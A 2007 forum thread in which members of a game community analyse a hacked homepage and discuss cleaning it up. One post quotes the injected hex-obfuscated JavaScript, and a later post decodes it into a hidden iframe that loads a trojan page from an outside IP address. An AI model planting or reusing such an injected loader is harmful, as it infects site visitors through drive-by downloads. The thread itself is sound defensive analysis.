Security Issue - Read Please!

Started by Shadow, August 26, 2007, 06:44:59 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

bjornredtail

Chances are he didn't. There may be some sort of file or shell exploit in some of the software running on the webserver that hosts this website.

Quote
function FUNC1(ARG1){
     return(parseInt(ARG1,16));
}
function FUNC2(ARG2){
    var VARIBLE1 ='';
    for(COUNTER = 0; COUNTER<ARG2.length; COUNTER+=2){
        VARIBLE1 +=(String.fromCharCode(FUNC1(ARG2.substr(COUNTER, 2))));
     }
return VARIBLE1;
} document.write(FUNC2('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D316139633132207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3830343433292B27386432666361373133315C272077696474683D373831206865696768743D313033207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
A bit of a translation of the code... I'll try firing up my linux box and execuateing it.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

bjornredtail

#31
Okay, first, in case the URL's auto link: DO NOT CLICK ANY LINK IN THE FOLLOWING POST. The URL is to the server that the hacked code points to.

Quote3CSCRIPT>window.status='Done';document.write('<iframe name=1a9c12 src=\'http://(adding_this_to_keep_link_from_working)58.65.235.153.(adding_this_to_keep_link_from_working)/~pozitive/ice/index.php?'+Math.round(Math.random()*80443)+'8d2fca7131\' width=781 height=103 style=\'display: none\'></iframe>')</SCRIPT>
That's what all that hex garbage translates too, minus the (adding_this_to_keep_link_from_working) part of course.

At the moment that server appears to be down...
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

Shadow

what does that mean?? :?

im computer illiterate for the most part
<=holbs-.. ..-holbs=> <=holbs-..

bjornredtail

The thing just prints all that hex stuff to the web page. Your browser turns it into the code I posted in the previous post, which in turn attempts to load a trojan horse from another server, which thankfully is down at the moment.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

Shadow

I hope Retto can fix it... how hard is it to get rid of that code once he knows about it?
<=holbs-.. ..-holbs=> <=holbs-..

windhound

As easy as opening his ftp / ssh client, opening index.php in a text editor (notepad) highlighting the offending line, and pushing delete.  Then ofcourse pushing the save button.

The slight issue would be making sure it doesnt happen again, but its more likely a problem with the server, which I'm assuming retto has no control over
A Goldfish has an attention span of 3 seconds...  so do I
~ In the beginning there was nothing, which exploded ~
There are only 10 types of people in the world: Those who understand binary, and those who don't

bjornredtail

ssh rovl.org
...
login as: whatever
password:

...
vim index.php
j
j
j
j
...
dd
:wq
logout

Assuming of course that only the homepage was compromised. Still, if Retto wasn't in class at the moment, or if someone else had SSH access it would have already been fixed.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

bjornredtail

It appears as if the breakin has been successfully cleaned up. The malicious code has been replaced with a rather amusing comment.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

Shadow

#38
what is it lol - how much do you like kung fu?
<=holbs-.. ..-holbs=> <=holbs-..